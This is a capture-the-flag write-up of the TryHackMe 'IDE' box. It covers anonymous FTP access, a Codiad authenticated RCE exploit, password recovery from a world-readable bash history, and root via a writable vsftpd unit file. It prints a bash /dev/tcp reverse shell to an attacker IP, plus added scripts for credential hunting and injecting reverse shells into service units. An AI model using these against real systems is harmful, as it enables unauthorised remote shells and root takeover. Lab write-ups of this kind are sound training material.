
TryHackMe - IDE

 ·  ☕ 5 min read  ·  ✍️ azadin

IDE

IDE An easy box to polish your enumeration skills!

Title: IDE
Description: IDE An easy box to polish your enumeration skills
Points: 60
Difficulty: Easy
Maker: bluestorm, 403Exploit

Summary

IDE: A misconfiguration in the FTP service exposes sensitive information, which is then used to authenticate to the Codiad service. Codiad is vulnerable to an authenticated remote code execution (RCE). For horizontal privilege escalation, we find another user’s password in a world-readable sensitive file. For vertical privilege escalation, we abuse a sudo permission that allows restarting a service as root.


Enumeration

A misconfiguration in the FTP service lets us log in as anonymous. Port 80 serves nothing interesting (the Apache default page), but port 62337 hosts a login panel for Codiad 2.8.4. While we are at it, we also check whether this version of the software has any known CVEs.

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.2.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_  256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Logging in to the FTP service as anonymous, we retrieve a file named '-' (a bare '-' is read as stdin by tools such as cat, so use ./- if a tool refuses to open it):

more -
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

This tells us three things: Codiad has a user named john, his password has been reset to the default, and there is most likely a user named drac on the system.

searchsploit codiad    
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                                                      | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                                                          | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)                                         | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)                                     | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)                                     | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)                                     | multiple/webapps/50474.txt
--------------------------------------------------------------------------------------------- ---------------------------------

The Codiad version running on port 62337 (2.8.4) is indeed vulnerable to an authenticated RCE, so we first need valid credentials. Guided by the FTP note, I tried john:password and it worked. A classic default.

Foothold

Once we have credentials we can run the exploit. First we copy it into our working directory with searchsploit -m:

└─$ searchsploit -m multiple/webapps/49705.py
  Exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49705
     Path: /usr/share/exploitdb/exploits/multiple/webapps/49705.py
    Codes: CVE-2018-14009
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/chida/sus/oo/heaven/49705.py

and run it, following the steps it gives you. The arguments are the Codiad URL, username, password, attacker IP, attacker port and target platform; start a listener for the port you hand it before the shell comes back:

python3 49705.py http://10.10.143.221:62337/ john password 10.9.2.77 1234 linux

We should have a shell as www-data by now:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ide:/var/www/html/codiad/components/filemanager$ 

Now we need to pivot and log in as drac. Looking in his home directory, we find that his .bash_history is world-readable and contains something interesting:

cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
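The history-file find above generalises into a small credential hunt. The script below is an added example, not code from the original write-up: it lists history files that another user left world-readable, greps them for lines that carry a secret on the command line, and parses the password out of a mysql invocation. The home directory tree it runs against is a constructed fixture so the script works offline; the function names and the regexes are my own choices, and on a target you would point hunt_histories at /home.

```bash
#!/usr/bin/env bash
# Added example, not code from the original write-up: hunt for shell history
# files that another user left world-readable and pull credential-looking
# lines out of them. The fixture below is constructed so the script runs
# offline; on a target you would call hunt_histories /home.
set -u

# List history files one level under home root $1 whose "other" read bit
# (004) is set, i.e. readable by any local user such as www-data.
find_world_readable_histories() {
    find "$1" -mindepth 2 -maxdepth 2 -type f -name '.*history' \
        -perm -004 2>/dev/null | sort
}

# Print lines of $1 that pass a secret on the command line: mysql -p, any
# --password flag, sshpass -p, or a NAME=value with PASS in the name.
credential_lines() {
    grep -E -- 'mysql .* -p ?[^[:space:]]+|--password[= ][^[:space:]]+|sshpass -p [^[:space:]]+|PASS(WORD)?=[^[:space:]]+' "$1" 2>/dev/null
}

# Pull the token after -p from a mysql command line, handling both
# "-pSECRET" and "-p 'SECRET'". Caveat: mysql itself only reads -pSECRET
# (no space) as a password; with a space the token is a database name and
# mysql prompts. The spaced form in a history file is therefore a guess
# worth trying, not proof of the password. The box's history line has that
# form, and the guess happens to be right.
mysql_password_from_line() {
    printf '%s\n' "$1" | sed -nE "s/.*mysql.* -p ?'?([^' ]+)'?.*/\1/p"
}

# Walk every world-readable history under $1 and print "file: line" for
# each credential-bearing line.
hunt_histories() {
    find_world_readable_histories "$1" | while IFS= read -r f; do
        credential_lines "$f" | while IFS= read -r line; do
            printf '%s: %s\n' "$f" "$line"
        done
    done
}

# Constructed fixture mirroring the box: drac's history is mode 644 and
# holds the mysql line, john's is 600 and must not be listed.
make_fixture() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/drac" "$root/john"
    printf "ls -la\nmysql -u drac -p 'Th3dRaCULa1sR3aL'\nexit\n" > "$root/drac/.bash_history"
    chmod 644 "$root/drac/.bash_history"
    printf 'whoami\n' > "$root/john/.bash_history"
    chmod 600 "$root/john/.bash_history"
    printf '%s\n' "$root"
}

# Stand-alone demo against the fixture.
demo_root=$(make_fixture)
hunt_histories "$demo_root"
rm -rf "$demo_root"
```

The permission test is on the file's mode bits (-perm -004) rather than on whether the current user can read it, so the same function doubles as a hardening check when run as root: anything it lists is readable by every local account.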

User flag

Strictly speaking, mysql treats a space-separated argument after -p as a database name rather than the password, so the string is a guess; it turns out to be drac's password. We ssh in as drac with it:

└─$ ssh drac@10.10.143.221                                       
drac@10.10.143.221's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jul  3 20:12:45 UTC 2025

  System load:  0.0               Processes:           110
  Usage of /:   49.9% of 8.79GB   Users logged in:     0
  Memory usage: 42%               IP address for ens5: 10.10.143.221
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

69 packages can be updated.
1 update is a security update.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jul  3 19:09:38 2025 from 10.9.2.77
drac@ide:~$ cat user.txt
02930d21a8eb009f6d26361b2d24a466
drac@ide:~$ 

Root flag

What can we run with sudo?

drac@ide:~$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

This is worth investigating. The first question is whether we can write to the service's unit file, so we locate it (it will be named vsftpd.service):

drac@ide:~$ locate vsftpd | grep .service
/lib/systemd/system/vsftpd.service

and it turns out we have write permission on it (confirm with ls -l on the path above). Here is the unit file after our edit:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=bash -c 'exec bash -i &>/dev/tcp/10.9.2.77/9001 <&1'
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

We changed ExecStart to the command shown above. ExecStart is the command systemd runs when the service starts, and because the unit sets no User=, whatever it runs executes as root. Start a listener (nc -lvnp 9001) and trigger the restart with the exact command sudo permits: sudo /usr/sbin/service vsftpd restart.

You should now have a reverse shell on port 9001 as root.
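The two halves of this escalation, spotting a unit file a non-root user can edit and rewriting its ExecStart=, are worth having as reusable helpers. The script below is an added example, not code from the original write-up: find_weak_units audits a unit directory for group- or world-writable .service files, and inject_reverse_shell rewrites ExecStart= the way the write-up does while keeping the rest of the unit intact. The unit directory it runs against is a constructed fixture (a copy of the stock vsftpd unit with the box's loose permissions) so it runs offline; the function names are my own, and on the box the real directory is /lib/systemd/system.

```bash
#!/usr/bin/env bash
# Added example, not code from the original write-up. Two helpers for the
# sudo-restart trick: find_weak_units lists unit files a non-root user could
# edit (the condition that turns "sudo service X restart" into root), and
# inject_reverse_shell rewrites a unit's ExecStart= the way the write-up
# does. The fixture is constructed so this runs offline; on the box the unit
# directory is /lib/systemd/system and the trigger is
# "sudo /usr/sbin/service vsftpd restart".
set -u

# List *.service files in $1 (default: the systemd unit directory) that are
# writable by group (020) or by others (002). A file only root can write is
# not interesting here even if sudo lets us restart the service.
find_weak_units() {
    local dir="${1:-/lib/systemd/system}"
    find "$dir" -maxdepth 1 -name '*.service' -type f \
        \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Replace the ExecStart= line of unit $1 with a bash reverse shell to $2:$3.
# Output goes to $4, or back into $1 when $4 is omitted. Design points:
#  - bash is given by absolute path: systemd 237 (Ubuntu 18.04) does not
#    search PATH for ExecStart=, newer releases do;
#  - the rewrite goes through "cat > file", not mv: we may only have write
#    permission on the file, not on its root-owned directory, and mv would
#    need to unlink the old file;
#  - every other line is kept so the unit still parses, and a unit with no
#    ExecStart= is refused rather than silently left broken.
inject_reverse_shell() {
    local unit="$1" lhost="$2" lport="$3" out="${4:-$1}" tmp
    local payload="ExecStart=/bin/bash -c 'exec bash -i &>/dev/tcp/${lhost}/${lport} <&1'"
    tmp=$(mktemp)
    if awk -v p="$payload" '
            /^ExecStart=/ { print p; seen = 1; next }
            { print }
            END { if (!seen) exit 2 }
        ' "$unit" > "$tmp"; then
        cat "$tmp" > "$out"
        rm -f "$tmp"
    else
        rm -f "$tmp"
        echo "no ExecStart= line in $unit, refusing to write a unit that cannot start" >&2
        return 1
    fi
}

# Constructed fixture: a copy of the stock vsftpd unit left group-writable
# (the box's misconfiguration), a correctly permissioned unit, and a
# world-writable unit with no ExecStart= for the failure path.
make_fixture() {
    local dir
    dir=$(mktemp -d)
    cat > "$dir/vsftpd.service" <<'EOF'
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
EOF
    chmod 664 "$dir/vsftpd.service"
    printf '[Unit]\nDescription=fine\n\n[Service]\nExecStart=/bin/true\n' > "$dir/fine.service"
    chmod 644 "$dir/fine.service"
    printf '[Unit]\nDescription=unit without ExecStart\n' > "$dir/broken.service"
    chmod 666 "$dir/broken.service"
    printf '%s\n' "$dir"
}

# Stand-alone demo: audit the fixture, then inject into the weak unit and
# show the result. On a real host, follow with a listener (nc -lvnp 9001)
# and the sudo-permitted restart.
demo_dir=$(make_fixture)
echo "weak units:"
find_weak_units "$demo_dir"
inject_reverse_shell "$demo_dir/vsftpd.service" 10.9.2.77 9001
grep -n '^Exec' "$demo_dir/vsftpd.service"
rm -rf "$demo_dir"
```

Run find_weak_units with no argument as a defensive check on any systemd host: a non-empty result means a sudo rule that only allows restarting that service is effectively a rule that allows root.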

Written by azadin, Cybersecurity Engineer